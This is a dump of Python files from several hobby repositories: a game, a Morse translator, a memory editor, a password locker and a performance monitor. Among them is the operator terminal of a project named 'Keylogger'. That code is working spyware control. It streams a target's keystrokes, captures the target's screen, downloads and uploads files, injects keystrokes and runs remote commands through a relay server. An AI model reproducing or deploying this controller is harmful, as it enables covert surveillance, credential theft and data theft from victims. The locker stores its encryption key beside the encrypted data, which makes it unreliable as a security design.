part2 = index + 1 if index + self.height >= len(pos_list) else index + self.height + 1
pos_list = pos_list[:part1] + pos_list[part2:]
self.__asteroids.append(self.__window.blit(self.__image,[pos_x, pos_y]))
def draw(self):
index = 0
for asteroid in self.__asteroids:
x = asteroid.x
y = asteroid.y
# Após desenhar, o objeto rect.Rect contido na lista de asteróides será atualizado
# por um novo objeto, a fim de evitar conflitos futuros.
self.__asteroids[index] = self.__window.blit(self.__image, [x, y] )
self.__asteroids[index].x = x
index += 1
@property
def empty(self):
return False if self.__asteroids else True
@property
def height(self):
return self.__HEIGHT
def move(self, px, scoreFunction = None):
index = 0
for asteroid in self.__asteroids:
asteroid.x -= px
# Percorre cada asteróide verificando se algum já saiu da tela do jogo.
for asteroid in self.__asteroids:
if asteroid.x < -self.width:
self.__asteroids.remove(asteroid)
if scoreFunction: scoreFunction()
@property
def width(self):
return self.__WIDTH
```
#### File: classes/util/sounds.py
```python
from pygame import mixer
mixer.init(buffer=1024)
class Sounds(object):
def play(self, filename, loop = 1):
mixer.music.load(filename)
mixer.music.play(loop)
def pause(self):
mixer.music.pause()
def unpause(self):
mixer.music.unpause()
```
|
{
"source": "JeanExtreme002/Brute-Force",
"score": 4
}
|
#### File: src/brute/charset.py
```python
import re
class Range(object):
def __init__(self, string = "a-zA-Z0-9"):
self.__range = re.findall("(.-.)", string)
def __iter__(self):
self.__index = -1
return self
def __next__(self):
self.__index += 1
if self.__index < len(self.__range):
return self.__range[self.__index].split("-")
raise StopIteration
def get_charset_from_file(filename, excludes = ["\n", " "]):
"""
Retorna uma lista com todos os caracteres de um arquivo
"""
charset = []
with open(filename) as file:
for char in file.read():
if not char in charset and not char in excludes:
charset.append(char)
return charset
def get_charset_from_range(range_obj):
"""
Recebe um objeto de Range e retorna uma lista de caracteres.
"""
if not isinstance(range_obj, Range):
raise TypeError('The "range_obj" parameter must be an instance of Range.')
charset = []
for range_ in range_obj:
start = ord(range_[0])
stop = ord(range_[1])
charset.extend([chr(char_id) for char_id in range(start, stop + 1)])
return charset
def get_default_charset():
"""
Retorna uma lista com os caracteres [A-Z a-z 0-9]
"""
range_ = Range("A-Za-z0-9")
return get_charset_from_range(range_)
```
|
{
"source": "JeanExtreme002/Chat",
"score": 3
}
|
#### File: app/popup/list.py
```python
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
import os
class List(Popup):
def __init__(self, title: str, size = ["400dp", "500dp"]):
path = os.path.split(__file__)[0]
self.content = Builder.load_file(os.path.join(path, "list.kv"))
super().__init__(title = title, content = self.content, size_hint = (None, None), size = size)
def insertItem(self, items, font_size = "15dp", height = "30dp", **kwargs):
"""
Insere itens na lista.
Param item: Deve ser uma lista contendo um ou dois valores somente, exemplo: ["carro", "moto"].
"""
align = ["left", "right"]
box = BoxLayout(size_hint_y = None, height = height)
for item in items[:2]:
label = Label(
text = item,
font_size = font_size,
size_hint_y = None,
height = height,
halign = align[items.index(item)],
**kwargs
)
label.bind(size = label.setter('text_size'))
box.add_widget(label)
self.content.ids.box.add_widget(box)
```
|
{
"source": "JeanExtreme002/Keylogger",
"score": 3
}
|
#### File: app/terminal/__init__.py
```python
from PIL import Image
from pyperclip import copy
from terminal.conn import *
from terminal.help import info
import base64
import io
import keyboard
import os
import random
import subprocess
import sys
import time
class Terminal(object):
__code = 0
__stop = True
__username = None
info = ""
output = ""
destroy_url = ""
input_url = ""
output_url = ""
keylogger_url = ""
def __init__(self, host = "localhost"):
self.__server = host
self.destroy_url = format_url(destroy_url = self.__server)
self.menu_url = format_url(menu_url = self.__server)
self.__commands = {
"activate": lambda args: self.change_status(True),
"copy": lambda args: copy(self.output),
"clear": lambda args: self.clear_screen(),
"destroy": lambda args: self.destroy(),
"download": lambda filename: self.download(filename),
"help": lambda args: self.help(),
"keylogger": lambda args: self.show_keys(),
"print": lambda args: self.print_screen(),
"save": lambda args: self.save_keys(),
"select": lambda user: self.change_user(user),
"send": lambda filename: self.send_file(filename),
"stop": lambda args: self.change_status(False),
"user": lambda args: print(" " + self.__username),
"users": lambda args: self.show_users(),
"write": lambda text: self.write(text)
}
keyboard.on_press_key("q", self.stop)
def change_status(self, status):
"""
Ativa ou desativa o envio de teclas.
"""
if not self.hasUser(): return
self.output = self.send("#self.activate();") if status else self.send("#self.stop();")
print(" " + self.output)
def change_user(self, user):
"""
Seleciona um usuário.
"""
# Verifica se o nome é válido.
if not user in get_users(self.menu_url):
return print(" " + user, "does not exists.")
# Define o usuário selecionado e as urls.
self.input_url = format_url(input_url = self.__server + "/" + user)
self.keylogger_url = format_url(keylogger_url = self.__server + "/" + user)
self.output_url = format_url(output_url = self.__server + "/" + user)
self.__username = user
def clear_screen(self):
"""
Limpa o terminal.
"""
if "win" in sys.platform: os.system("cls")
else: os.system("clear")
def destroy(self):
"""
Apaga todos os dados do servidor.
"""
send(url = self.destroy_url, text = "True")
def download(self, filename):
"""
Baixa um arquivo do computador alvo.
"""
if not self.hasUser(): return
output = self.send('#self.download(r"{}");'.format(filename))
data = base64.b64decode(output)
with open(os.path.split(filename)[-1], "wb") as file:
file.write(data)
def get_code(self):
"""
Retorna um código.
"""
self.__code += random.randint(1, 9)
return self.__code
def hasUser(self):
"""
Verifica se um usuário foi selecionado.
"""
if self.__username: return True
print(" No users were selected.")
def help(self):
"""
Imprime texto de ajuda.
"""
print(self.info)
def print_screen(self):
"""
Obtém imagem da tela do computador alvo.
"""
if not self.hasUser(): return
# Obtém os bytes da imagem.
output = self.send("#self.print_screen();")
image_data = base64.b64decode(output)
# Mostra a imagem.
image = Image.open(io.BytesIO(image_data))
image.show()
def run(self):
"""
Inicializa o terminal.
"""
while True:
# Obtém o comando do usuário.
command = input("\n In: ")
print("")
if not command: continue
# Verifica se o input é um comando pré-definido.
if command.split(" ", maxsplit = 1)[0].lower() in self.__commands:
command = command.split(" ", maxsplit = 1)
self.__commands[command[0].lower()](command[-1])
continue
# Verifica se é um comando de terminal do próprio usuário.
elif not command[0] in "$#&":
self.output = str(subprocess.getoutput(command))
print(self.output)
continue
# Verifica se um usuário foi selecionado.
elif not self.__username:
print(" No users were selected.")
continue
# Verifica se o comando acaba com ponto e vírgula.
elif not command.endswith(";"):
print(' Use ";" at the end of each command.')
continue
# Envia um comando para o computador alvo.
self.output = self.send(command)
print(" " + self.output)
def save_keys(self):
"""
Salva as teclas pressionadas em um arquivo de texto.
"""
if not self.hasUser(): return
chars = 0
with open("keys_%s.txt" % self.__username, "w") as file:
# Percorre todas as chaves e as escreve dentro do arquivo.
for key in get_keys(self.keylogger_url):
file.write(key + " ")
chars += len(key)
# Limita cada linha a apenas 60 caracteres.
if chars >= 60:
file.write("\n")
chars = 0
def send(self, command):
"""
Envia comando para ser executado no computador alvo.
"""
# Obtém um novo código para o envio.
code = self.get_code()
# Envia o comando.
send(url = self.input_url, text = str(code) + ":" + command)
r_code = -1
# Espera pela resposta que possui o mesmo código do envio.
while int(r_code) != code:
output = get_content(self.output_url)
if ":" in output:
r_code, output = output.split(":", maxsplit = 1)
# Retorna a resposta obtida.
return output
def send_file(self, filename):
"""
Envia um arquivo.
"""
if not self.hasUser(): return
# Verifica se o arquivo existe.
if not os.path.exists(filename):
print(" This file does not exist")
return
with open(filename, "rb") as file:
data = file.read()
data = base64.b64encode(data).decode()
filename = os.path.split(filename)[-1]
# Envia os dados.
output = self.send('#self.create_file(r"{}","{}");'.format(filename, data))
print(" " + output)
def show_keys(self):
"""
Mostra as teclas pressionadas pelo usuário.
"""
if not self.hasUser(): return
self.__stop = False
while not self.__stop:
# Obtém todas as teclas pressionadas.
keys = get_keys(self.keylogger_url, wait = False)
self.clear_screen()
# Percorre todas as teclas e as imprime.
for key in keys:
print(" "+ key, end = "")
if key.lower() == "enter": print("")
print("")
time.sleep(0.1)
def show_users(self):
"""
Mostra todos os usuários do servidor.
"""
users = get_users(self.menu_url)
for user in users: print(" " + user)
def stop(self, key = None):
"""
Interrompe um evento.
"""
self.__stop = True
def write(self, text):
"""
Escreve um texto no computador alvo.
O caractere especial <enter> serve para a tecla ENTER
ser apertada no computador alvo.
"""
if not self.hasUser(): return
keys = []
# Percorre todos os caracteres do texto.
for char in text.replace("<enter>", "\n"):
if char == "\n": char = "enter"
keys.append(char)
# Envia o comando.
self.output = self.send("#pyautogui.press({});".format(keys))
print(" " + self.output)
Terminal.info = info
```
#### File: app/model/database.py
```python
class Database():
__users = {}
def __contains__(self, user):
return user in self.__users
def addKey(self, user, value):
self.__users[user]["keys"].append(value)
def createUser(self, user):
self.__users[user] = {"keys": [], "output": "", "input": ""}
def destroy(self):
self.__users.clear()
def getInput(self, user):
input = self.__users[user]["input"]
self.__users[user]["input"] = ""
return input
def getKeys(self, user):
return self.__users[user]["keys"]
def getOutput(self, user):
output = self.__users[user]["output"]
self.__users[user]["output"] = ""
return output
def setInput(self, user, value):
self.__users[user]["input"] = value
def setOutput(self, user, value):
self.__users[user]["output"] = value
@property
def users(self):
return list(self.__users.keys())
```
|
{
"source": "JeanExtreme002/Locker",
"score": 3
}
|
#### File: src/client/display.py
```python
from colorama import Fore, Style
def show_message(message, end = "\n"):
print(Style.RESET_ALL + str(message), end = end)
def show_warning(message, end = "\n"):
print(Fore.YELLOW + str(message), end = end)
def show_error(message, end = "\n"):
print(Fore.RED + str(message), end = end)
```
#### File: src/manager/database.py
```python
from ..util import crypt
from ..util import system
import json
import os
class Database(object):
def __init__(self, filename):
self.__filename = filename
self.__data = dict()
# Get the data from the database.
self.__create() if not os.path.exists(filename) else self.__load_data()
def __create(self):
# Generate a key and create the database.
self.__key = crypt.generate_keyV2()
self.__update_database()
def __decrypt(self, key, data):
# Return the decrypted data.
return json.loads(crypt.decryptV2(key, data).decode())
def __encrypt(self, key, data):
# Return the encrypted data.
return crypt.encryptV2(key, json.dumps(data).encode())
def __load_data(self):
# Open the file and get its data.
with open(self.__filename, "rb") as file:
key, data = file.read().split("=".encode(), maxsplit = 1)
# Get the key and decrypt the data.
self.__key = key + "=".encode()
self.__data = self.__decrypt(self.__key, data)
# Hide the file.
system.set_dir_attr("+H", self.__filename, all = False)
def __update_database(self):
# Encrypt the data.
data = self.__encrypt(self.__key, self.__data)
# Show the file.
system.set_dir_attr("-H", self.__filename, all = False)
# Save the data to the file.
with open(self.__filename, "wb") as file:
file.write(self.__key + data)
# Hide the file.
system.set_dir_attr("+H", self.__filename, all = False)
def get_data(self):
# Return a copy of the data.
return self.__data.copy()
def get_key(self):
# Return the sum of the key characters.
return sum([ord(char) for char in self.__key.decode()])
def update(self, data):
# Update the data in the database.
self.__data = data.copy()
self.__update_database()
```
#### File: util/crypt/cryptV2.py
```python
from cryptography.fernet import Fernet
def decryptV2(key: bytes, data: bytes) -> bytes:
return Fernet(key).decrypt(data)
def encryptV2(key: bytes, data: bytes) -> bytes:
return Fernet(key).encrypt(data)
def generate_keyV2() -> bytes:
return Fernet.generate_key()
```
|
{
"source": "JeanExtreme002/MemoryManager",
"score": 3
}
|
#### File: MemoryManager/PyMemoryEditor/__init__.py
```python
__author__ = "<NAME>"
__version__ = "1.0.1"
from .process import Process
from .win32.constants import PROCESS_ALL_ACCESS, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE
from .win32.functions import CloseHandle, GetProcessHandle, ReadProcessMemory, WriteProcessMemory
__all__ = ("OpenProcess", "PROCESS_ALL_ACCESS", "PROCESS_VM_OPERATION", "PROCESS_VM_READ", "PROCESS_VM_WRITE")
class OpenProcess(object):
def __enter__(self): return self
def __exit__(self, exc_type, exc_value, exc_traceback): self.close()
def __init__(self, window_title = None, process_name = None, pid = None, permission = PROCESS_ALL_ACCESS):
# Instantiate the permission argument.
self.__permission = permission
# Create a Process instance.
self.__process = Process()
# Set the attributes to the process.
if pid:
self.__process.pid = pid
elif window_title:
self.__process.window_title = window_title
elif process_name:
self.__process.process_name = process_name
else:
raise TypeError("You must pass an argument to one of these parameters (window_title, process_name, pid).")
# Get the process handle.
self.__process_handle = GetProcessHandle(permission, False, self.__process.pid)
def close(self):
"""
Close the process handle.
"""
return CloseHandle(self.__process_handle)
def read_process_memory(self, address, pytype, bufflength):
"""
Return a value from a memory address.
@param address: Target memory address (ex: 0x006A9EC0).
@param type_: Type of the value to be received (str, int or float).
@param bufflength: Value size in bytes (1, 2, 4, 8).
"""
if not self.__permission in [PROCESS_ALL_ACCESS, PROCESS_VM_READ]:
raise PermissionError("The handle does not have permission to read the process memory.")
return win32.functions.ReadProcessMemory(self.__process_handle, address, pytype, bufflength)
def write_process_memory(self, address, pytype, bufflength, value):
"""
Write a value to a memory address.
@param address: Target memory address (ex: 0x006A9EC0).
@param pytype: Type of value to be written into memory (str, int or float).
@param bufflength: Value size in bytes (1, 2, 4, 8).
@param value: Value to be written (str, int or float).
"""
if not self.__permission in [PROCESS_ALL_ACCESS, PROCESS_VM_OPERATION | PROCESS_VM_WRITE]:
raise PermissionError("The handle does not have permission to write to the process memory.")
return WriteProcessMemory(self.__process_handle, address, pytype, bufflength, value)
```
#### File: PyMemoryEditor/process/errors.py
```python
class ProcessIDNotExistsError(Exception):
def __init__(self, pid):
self.__pid = pid
def __str__(self):
return "The process ID \"%i\" does not exist." % self.__pid
class ProcessNotFoundError(Exception):
def __init__(self, process_name):
self.__process_name = process_name
def __str__(self):
return "Could not find the process \"%s\"." % self.__process_name
class WindowNotFoundError(Exception):
def __init__(self, window_title):
self.__window_title = window_title
def __str__(self):
return "Could not find the window \"%s\"." % self.__window_title
```
#### File: PyMemoryEditor/process/__init__.py
```python
from .errors import ProcessIDNotExistsError, ProcessNotFoundError, WindowNotFoundError
from .util import get_process_id_by_process_name, get_process_id_by_window_title, pid_exists
class Process(object):
__pid = 0
__process_name = ""
__window_title = ""
@property
def pid(self):
return self.__pid
@pid.setter
def pid(self, pid):
# Check if the value is an integer.
if not isinstance(pid, int):
raise ValueError("The process ID must be an integer.")
# Check if the PID exists and instantiate it.
if pid_exists(pid): self.__pid = pid
else: raise ProcessIDNotExistsError(pid)
@property
def process_name(self):
return self.__process_name
@process_name.setter
def process_name(self, process_name):
# Get the process ID.
pid = get_process_id_by_process_name(process_name)
if not pid: raise ProcessNotFoundError(process_name)
# Set the PID and process name.
self.__pid = pid
self.__process_name = process_name
@property
def window_title(self):
return self.__window_title
@window_title.setter
def window_title(self, window_title):
# Get the process ID.
pid = get_process_id_by_window_title(window_title)
if not pid: raise WindowNotFoundError(window_title)
# Set the PID and the window title.
self.__pid = pid
self.__window_title = window_title
```
#### File: PyMemoryEditor/win32/functions.py
```python
from .util import get_c_type_of
from ctypes import byref, windll, c_void_p
kernel32 = windll.LoadLibrary("kernel32.dll")
def CloseHandle(handle) -> int:
"""
Close the process handle.
"""
return kernel32.CloseHandle(handle)
def GetProcessHandle(access_right, inherit, pid) -> int:
"""
Get a process ID and return its process handle.
"""
return kernel32.OpenProcess(access_right, inherit, pid)
def ReadProcessMemory(process_handle, address, pytype, bufflength):
"""
Return a value from a memory address.
"""
if not pytype in [str, int, float]: raise ValueError("The type must be string, int or float.")
data = get_c_type_of(pytype, int(bufflength))
kernel32.ReadProcessMemory(process_handle, c_void_p(address), byref(data), bufflength, None)
return data.value
def WriteProcessMemory(process_handle, address, pytype, bufflength, value):
"""
Write a value to a memory address.
"""
if not pytype in [str, int, float]: raise ValueError("The type must be string, int or float.")
data = get_c_type_of(pytype, int(bufflength))
data.value = value.encode() if isinstance(value, str) else value
kernel32.WriteProcessMemory(process_handle, c_void_p(address), byref(data), bufflength, None)
return value
```
|
{
"source": "JeanExtreme002/Morse-Code-Translator",
"score": 3
}
|
#### File: JeanExtreme002/Morse-Code-Translator/app.py
```python
from translator import MorseCodeTranslator
from tkinter import Tk,Label,Text,Frame,Button,Scrollbar,IntVar
import sys
if "win" in sys.platform:
from winsound import Beep
class App(object):
"""
Classe principal
"""
__button_width = 15
__button_height = 1
__button_bg = "green2"
__button_fg = "white"
__button_font = ("Autumn",27)
__button_relief = "flat"
__inputText_height = 5
__label_fg = "#F5F5F5"
__label_font = ("Impact",20)
__outputText_height = 7
__text_width = 50
__text_bg = "white"
__text_fg = "black"
__text_font = ("Arial",14)
frequency = 1500
window_title = "Morse Code Translator"
window_geometry = [600,500]
window_bg = "gray50"
def __init__(self):
# Cria uma instância de Tk e configura a janela.
self.__root = Tk()
self.__root.geometry("{}x{}".format(*self.window_geometry))
self.__root["bg"] = self.window_bg
self.__root.title(self.window_title)
self.__root.resizable(False,False)
self.__root.focus_force()
self.__root.bind("<Return>",self.translate)
self.__playing = False
self.__waitVar = IntVar()
# Chama método para construir a interface do programa.
self.build()
def build(self):
"""
Método para construir interface do programa.
"""
# Cria um título para a entrada do texto que será traduzido.
Label(
self.__root,
bg = self.window_bg,
font = self.__label_font,
fg = self.__label_fg,
text = "Input:",
pady = 10
).pack()
# Cria frame para colocar o campo de input.
input_frame = Frame(self.__root,bg=self.window_bg)
input_frame.pack()
# Cria um campo para o usuário inserir o texto.
self.__inputText = Text(
input_frame,
width = self.__text_width,
height = self.__inputText_height,
bg = self.__text_bg,
fg= self.__text_fg,
font = self.__text_font,
wrap = "word"
)
self.__inputText.insert(0.0," Type here...")
# Cria uma barra de rolagem para o campo de input.
scrollbar = Scrollbar(input_frame)
scrollbar.pack(side="right",fill="y")
self.__inputText.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=self.__inputText.yview)
self.__inputText.pack()
# Cria título de campo onde será colocado o texto traduzido.
Label(
self.__root,
bg = self.window_bg,
font = self.__label_font,
fg = self.__label_fg,
text = "Output:",
pady = 10
).pack()
# Cria frame para colocar o campo de output.
output_frame = Frame(self.__root,bg=self.window_bg)
output_frame.pack()
# Campo para colocar o texto traduzido.
self.__outputText = Text(
output_frame,
width = self.__text_width,
height = self.__outputText_height,
bg = self.__text_bg,
fg= self.__text_fg,
font = self.__text_font,
wrap = "word"
)
self.__outputText.insert(0.0," The text translation will appear here.")
# Cria uma barra de rolagem para o campo de output.
scrollbar = Scrollbar(output_frame)
scrollbar.pack(side="right",fill="y")
self.__outputText.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=self.__outputText.yview)
self.__outputText.pack()
# Cria frame para inserir os botões.
buttons_frame = Frame(self.__root,bg=self.window_bg,pady=20)
buttons_frame.pack()
# Cria uma "borda" para o botão.
button1_frame = Frame(buttons_frame,bg="black",padx=2,pady=2)
button1_frame.pack(side="left")
# Cria botão para traduzir o texto.
self.__button1 = Button(
button1_frame,
width = self.__button_width,
height = self.__button_height,
relief = self.__button_relief,
bg = self.__button_bg,
fg = self.__button_fg,
font = self.__button_font,
text = "Translate",
command = self.translate
)
self.__button1.pack()
# Se o OS do usuário for Windows, será criado um botão
# para reproduzir o som do codigo morse.
if "win" in sys.platform:
Label(buttons_frame,bg=self.window_bg,padx=5).pack(side="left")
# Cria uma "borda" para o botão.
button2_frame = Frame(buttons_frame,bg="black",padx=2,pady=2)
button2_frame.pack(side="left")
# Cria botão para reproduzir som do código morse.
self.__button2 = Button(
button2_frame,
width = self.__button_width,
height = self.__button_height,
relief = self.__button_relief,
bg = self.__button_bg,
fg = self.__button_fg,
font = self.__button_font,
text = "Play",
command = self.play
)
self.__button2.pack()
self.__root.mainloop()
def play(self):
"""
Método para reproduzir o som do código morse.
"""
# Para a reprodução.
if self.__playing:
self.__playing = False
return
# Obtém o texto do output e verifica se é um código morse.
text = self.__outputText.get(0.0,"end")
if not text or text.isspace() or not MorseCodeTranslator.isMorse(text): return
# Informa que o som do código morse está sendo reproduzido.
self.__playing = True
self.__button2.config(text = "Stop")
# Divide texto em palavras.
for char in text.split(" "):
# Obtém cada letra da palavra.
for l in char:
if not self.__playing:
break
# Verifica se o caractere é de erro.
if l == MorseCodeTranslator.errorChar:
continue
# Toca um beep por 0,3 segundos cado seja um ponto.
if l == ".":
Beep(self.frequency,300)
# Toca um beep por 0.6 segundos caso seja um traço.
elif l == "-":
Beep(self.frequency,600)
# Dorme por 2.1 segundos caso seja o início de uma nova palavra.
elif l == "/":
self.wait(2100)
if not self.__playing:
break
# Aguarda 0.9 segundos.
self.wait(900)
# Informa que a reprodução acabou.
self.__playing = False
self.__button2.config(text = "Play")
def translate(self,event=None):
"""
Método do botão para traduzir o texto.
"""
# Obtém o input do usuário.
text = self.__inputText.get(0.0,"end")
if not text: return
# Apaga o texto do campo de output e insere o input do usuário traduzido.
self.__outputText.delete(0.0,"end")
self.__outputText.insert(0.0,MorseCodeTranslator.translate(text))
def wait(self,ms):
"""
Método para aguardar um tempo em Ms.
"""
self.__waitVar.set(0)
self.__root.after(ms,self.__waitVar.set,1)
self.__root.wait_variable(self.__waitVar)
self.__waitVar.set(0)
if __name__ == "__main__":
App()
```
|
{
"source": "JeanExtreme002/Performance-Monitor",
"score": 3
}
|
#### File: Performance-Monitor/src/monitoringWindow.py
```python
from tkinter import Canvas,Label,Tk
import psutil
import src.util
import time
class MonitoringWindow(object):
X = 30
Y = 30
VERTICAL = 1
HORIZONTAL = 2
cursor = "cross white"
__movable = False
__direction = HORIZONTAL
def __init__(self,chromaKeyColor="black"):
# Cria a janela realizando algumas configurações.
self.__root = Tk()
self.__root.resizable(False,False)
self.__root.overrideredirect(True)
self.__root["bg"] = chromaKeyColor
self.__destroy = False
# Define o tamanho da janela como sendo o tamanho do monitor do usuário.
self.__width = self.__root.winfo_screenwidth()
self.__height = self.__root.winfo_screenheight()
self.__root.geometry("{}x{}+0+0".format(self.__width,self.__height))
# Realiza o chroma key e configura a janela para ficar sempre no topo de tudo.
# Dessa forma, as informações ficarão sempre visíveis.
self.__chromaKeyColor = chromaKeyColor
self.__root.wm_attributes("-transparentcolor",self.__chromaKeyColor)
self.__root.wm_attributes("-topmost", True)
def adjustLocation(self):
"""
Método para ajustar a posição dos textos na tela.
"""
i = 0
lastcoord = [0,0,0,0]
for item in self.__items:
if not item: continue
coord = self.__canvas.bbox(item)
# Se a direção for VERTICAL, o texto será posicionado em pilha, um em baixo do outro.
if self.__direction == self.VERTICAL:
self.__canvas.move(item,coord[0]*-1+self.X,coord[1]*-1+self.Y+self.__spacing*i)
# Se a direção for HORIZONTAL, o texto será posicionado no lado dos outros textos.
else:
# Caso o item seja o primeiro texto, será adicionado à sua posição X a posição X do bloco de textos.
if i == 0:
self.__canvas.move(item,coord[0]*-1+self.X,coord[1]*-1+self.Y)
# Senão, a posição X do item será a posição X2 do último item somado ao tamanho da fonte.
else:
self.__canvas.move(item,(coord[0]-lastcoord[2])*-1+self.__font[1],coord[1]*-1+self.Y)
lastcoord = coord
i+=1
def build(self,color="red",font=("Arial",40),ping=True,cpu=True,ram=True,memory=True,battery=True,outline="black",direction=VERTICAL,movable=True):
"""
Método para construir a parte gráfica
relacionada às informações de performance.
"""
self.__ping = ping
self.__cpu = cpu
self.__ram = ram
self.__memory = memory
self.__battery = battery
self.__color = color
self.__font = font
self.__outline = outline
# Obtém a direção do texto
if direction in [self.VERTICAL,self.HORIZONTAL]: self.__direction = direction
# Cria um canvas que será usado para guardar os textos.
# Esse canvas possuirá uma cor do chroma key, para que
# ele suma e seja visível somente os textos.
self.__canvas = Canvas(
self.__root,
bg=self.__chromaKeyColor,
width=self.__width,
height=self.__height,
highlightthickness=0,
)
# Caso a opção "movable" seja True, o usuário poderá mover o texto caso ele clique no mesmo.
if movable:
self.__canvas.bind("<Button-1>",self.__move)
self.__canvas.config(cursor=self.cursor)
# Essa lista guardará o ID de todos os textos.
self.__items = []
# Cria um texto para informar o PING.
if ping:
self.__items.append(self.__canvas.create_text(0,0,text="PING:",fill=color,font=font,tag="PING"))
# Cria um texto para cada CPU que o usuário possuir.
if cpu:
self.__items.append(self.__canvas.create_text(0,0,text="CPU:",fill=color,font=font,tag="CPU"))
for i in range(psutil.cpu_count()):
self.__items.append(self.__canvas.create_text(0,0,text="CPU {}:".format(i+1),fill=color,font=font,tag="CPU"))
# Cria um texto para o uso de RAM.
if ram:
self.__items.append(self.__canvas.create_text(0,0,text="RAM:",fill=color,font=font,tag="RAM"))
# Cria texto para mostrar o consumo de memória atual e a memória total.
if memory:
self.__items.append(self.__canvas.create_text(0,0,text="MEMORY:",fill=color,font=font,tag="MEMORY"))
# Cria texto para informar a situação da bateria.
if battery:
self.__items.append(self.__canvas.create_text(0,0,text="BATTERY:",fill=color,font=font,tag="BATTERY"))
# Obtém a altura dos textos para realizar um espaçamento entre eles.
if len(self.__items) > 0:
coord = self.__canvas.bbox(self.__items[0])
self.__spacing = coord[3] - coord[1]
# Atualiza a janela
self.__update()
self.__canvas.pack()
def close(self):
"""
Encerra totalmente a janela de monitoramento.
"""
self.stop()
self.__destroy = True
def drawOutline(self):
"""
Método para criar uma borda no texto.
"""
size = 2
color = self.__outline
self.__canvas.delete('outline')
# Percorre cada texto da lista.
for item in self.__items:
if not item: continue
# Obtém as coordenadas do texto no formato (X,Y).
coord = self.__canvas.bbox(item)
coord = (coord[0]+((coord[2]-coord[0])//2) , coord[1]+((coord[3]-coord[1])//2))
# Obtém o texto
text = self.__canvas.itemcget(item,"text")
# Desenha no canvas o mesmo texto com a mesma fonte,
# porém numa posição diferente para dar um efeito de borda.
self.__canvas.create_text(coord[0]-size,coord[1],text=text,font=self.__font,fill=color,tag='outline')
self.__canvas.create_text(coord[0]+size,coord[1],text=text,font=self.__font,fill=color,tag='outline')
self.__canvas.create_text(coord[0],coord[1]-size,text=text,font=self.__font,fill=color,tag='outline')
self.__canvas.create_text(coord[0],coord[1]+size,text=text,font=self.__font,fill=color,tag='outline')
# Coloca o texto principal na frente.
self.__canvas.tag_raise(item)
def __drawRect(self):
"""
Método para criar um retângulo caso o usuário tenha clicado no texto.
"""
self.__canvas.delete("rect")
# Verifica se o usuário clicou ou não no texto.
if not self.__movable: return
size = 4
x1 = self.__width
y1 = self.__height
x2 = 0
y2 = 0
# Obtém as coordenadas (x1,y1,x2,y2) para desenhar o retângulo.
for item in self.__items:
coord = self.__canvas.bbox(item)
if coord[0] < x1:
x1 = coord[0]-10
if coord[1] < y1:
y1 = coord[1]-10
if coord[2] > x2:
x2 = coord[2]+10
if coord[3] > y2:
y2 = coord[3]+10
# Cria um retângulo.
self.__canvas.create_line((x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1),fill=self.__color,width=size,tag="rect")
x1 -= size//2
y1 -= size//2
x2 += size//2
y2 += size//2
# Cria uma borda externa.
self.__canvas.create_line((x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1),fill=self.__outline,tag="rect")
x1 += size
y1 += size
x2 -= size
y2 -= size
# Cria uma borda interna.
self.__canvas.create_line((x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1),fill=self.__outline,tag="rect")
def __move(self,event=None):
"""
Método para mover o texto para a posição X,Y do mouse.
"""
# Deleta retângulo do mouse.
self.__canvas.delete("mouse")
# Caso o método tenha sido chamado por causa de um método, o texto não será movimentado.
if event:
if not self.__canvas.focus_get() and not self.__movable: return
self.__movable = not self.__movable
return
if not self.__movable: return
# Obtém a posição X,Y do mouse.
x = self.__root.winfo_pointerx()
y = self.__root.winfo_pointery()
# Verifica se o mouse está parado. Se sim será retornado False. Se não será retornado True.
if self.X == x and self.Y == y: return False
# Cria um retângulo para que o usuário possa clicar num item do canvas fazendo
# com que o mesmo tenha foco. Dessa forma, o usuário poderá sair da opção de mover o texto.
size = 5
self.__canvas.create_rectangle(x-size-3,y-size-3,x+size-3,y+size-3,fill=self.__color,outline=self.__outline,tag="mouse")
self.X = x+3
self.Y = y+3
return True
def run(self,updateIn=1000,number_size_after_floating_point=2):
"""
Método para inicializar o monitoramento.
"""
self.__stop = False
i = 1
ping = "0"
total_cpu_usage = 0
memory_percent = 0
memory_used = 0
memory_total = 0
battery_percent = 0
battery_power_plugged = False
# Atualiza as informações enquanto o usuário não
# pedir para parar o monitoramento.
while not self.__stop:
# Se tiver passado X ou mais segundos, as informações dos textos serão atualizadas
if not self.__movable:
# Obtém o ping.
if self.__ping:
c_ping = src.util.getLatency()
if not c_ping: c_ping = "Undefined"
# Obtém o consumo de CPU.
if self.__cpu:
cpu = psutil.cpu_percent(0,True)
c_total_cpu_usage = sum(cpu)*(100/(len(cpu)*100))
cpu_i = -1
# Obtém o consumo de memória RAM.
if self.__ram or self.__memory:
memory = psutil.virtual_memory()
# Obtém as informações de bateria.
if self.__battery:
battery = psutil.sensors_battery()
# Atualiza as informações de cada item.
for item in self.__items:
if not item: continue
# Obtém a tag do item e atualiza a informação.
tag = self.__canvas.itemcget(item,"tag")
# Antes de fazer a atualização de um determinado texto, será verificado
# se os novos dados são iguais aos dados que estão no texto. Essa verificação serve
# para que não haja um consumo desnecessário de processamento. Dessa forma, será atualizado
# o texto apenas se for necessário.
# Atualiza o PING.
if tag.lower() == "ping":
if ping == c_ping: continue
text = "PING: "+c_ping
ping = c_ping
# Atualiza as informações de consumo de CPU.
elif tag.lower() == "cpu":
if total_cpu_usage == c_total_cpu_usage:
continue
if cpu_i == -1:
text = "CPU: %.{}f%%".format(number_size_after_floating_point)%c_total_cpu_usage
else:
text = "CPU %i: %.{}f%%".format(number_size_after_floating_point)%(cpu_i+1,cpu[cpu_i])
cpu_i += 1
if cpu_i == len(cpu):
total_cpu_usage = c_total_cpu_usage
# Atualiza as informações de consumo de RAM.
elif tag.lower() == "ram":
if memory_percent == memory.percent:
continue
text = "RAM: %.{}f%%".format(number_size_after_floating_point)%memory.percent
memory_percent = memory.percent
# Atualiza as informações de consumo da memória.
elif tag.lower() == "memory":
if memory_used == memory.used and memory_total == memory.total:
continue
text = "MEMORY: %i %s / %i %s"%(*src.util.getFormattedSize(memory.used),*src.util.getFormattedSize(memory.total))
memory_used = memory.used
memory_total = memory.total
# Atualiza as informações de bateria.
